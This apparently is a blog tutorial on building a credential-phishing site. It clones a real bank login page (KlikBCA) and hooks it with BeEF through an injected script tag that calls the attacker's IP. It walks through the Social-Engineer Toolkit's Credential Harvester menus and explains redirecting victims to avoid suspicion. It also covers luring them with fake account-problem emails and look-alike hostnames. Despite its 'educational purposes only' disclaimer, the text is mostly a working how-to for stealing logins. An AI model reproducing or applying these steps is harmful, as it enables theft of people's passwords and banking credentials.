Create a Phishing Website

Attention: This post is for educational purposes only. I do not advise or encourage anyone to do the following process for malicious reasons.

Phishing is the attempt to obtain sensitive information such as usernames, passwords, and credit card details by disguising as a trustworthy entity in an electronic communication. Phishing might be useful during the Social Engineering step in Kali Linux Penetration Testing process. Social engineering is the practice of learning and obtaining valuable information by exploiting human vulnerabilities.

In this post, I’m going to show you how to create a phishing website using 2 methods: BeEF XSS Framework and SET. Not only that, I’ll talk about how a hacker persuades their target to go to his/her fake website and obtain the important information.

BeEF XSS Framework

The first thing to do is to duplicate the real website. Go to your chosen website, press CTRL+Shift+I or Right-click → Inspect to inspect the website elements. Click the HTML tag (shown in the picture below) and press CTRL+C to copy all the HTML codes. After that, you can create a new file containing the HTML codes you’ve copied and upload the file to your online server.

Here’s my fake website that I put in my online hosting server

After that launch BeEF XSS Framework Application. This will redirect to the login page. The default username & password: beef.

BeEF’s Login Page

To hook an online page so that the BeEF application can start capturing what the user is doing on the hooked page, drag the ‘Hook Me!’ that I’ve circled to the Bookmark Bar.

Then go to the website you’re hosting, click ‘Hook Me!’ button in your bookmark bar. Another method to hook a page is by inserting <script src=”http://<yourIP>:3000/hook.js”></script> in your code. Now that your page is successfully hooked, BeEF can listen to every event happened on the page server. We can determine the username and password if the user tries to login since every action the user do is recorded in BeEF.

Note: don’t forget to modify the code so that when the user click ‘Login’ button in the fake website, it will redirect the user to the real website’s login page so the user will not get suspicious if it is a fake website.

The Social-Engineer Toolkit (SET)

The SET supports all the stuff I did using BeEF XSS Framework but without all the hustle. The process of cloning a website and capturing the sensitive information are simplified with just several clicks away.

My another fake website but the server is my local Kali Linux address.

The picture above has no different right compared to the site I’ve made earlier? The only difference is only the IP address of each website.

Well, to clone a website using SET, open your SET application first by typing setoolkit in your Terminal. The following menu shown in the picture below will appear on your Terminal.

Type 1 then press Enter to perform a Social-Engineering Attacks

Then, select 2 for Website Attack Vectors option

Next, choose the 3rd option which is the Credential Harvester method that will utilize web cloning of a web- site that has a username and password field and harvest all the information posted to the website.

Input 2 for using the Site Cloner feature

After following all steps listed above, the last couple steps to do are inserting your IP address where every user input will be logged in SET and then inputing the real website url that you want to clone.

This is the result if a user clicks a Submit button on the phishing website. The fake website will also automatically redirect to the real page.

SET also automatically creates a report of all findings captured.

This shows the location where the reports are saved.

Findings report in XML format

Findings report HTML format

 

It is that easy to create a Phishing website. But the questions now are how does the attacker publicize their website to their target and why can people still think it is a real website?

The common example is to send an email pretending to be the website and tell the user has some problems with their account which needs to be resolved by logging in to the website first. Without a doubt, the user will click the link and proceed to the login page. Usually, a phishing website has a similar hostname like the real one. E.g. www.ibank.klikbca.com to www.bank.klikbca.com. The user often does not check the small details like that.

Example of Phishing Email

Last but not least, I would like to inform you guys that creating a phishing website for malicious purposes is not cool. Do it for penetration testing only! Oh ya, I also got an email from my hosting place when I was cloning the KlikBCA’s front page saying that someone reported me for uploading a phishing content. It’s good to know that today’s internet security is pretty secure (let’s hope so).

Warning email from Digital Ocean

 

References

  • https://www.globalsign.com/en/blog/how-to-spot-a-fake-website/
  • http://www.cbq.qa/en/advice-and-information/information-library/how-to-guides/pages/phishing-examples.aspx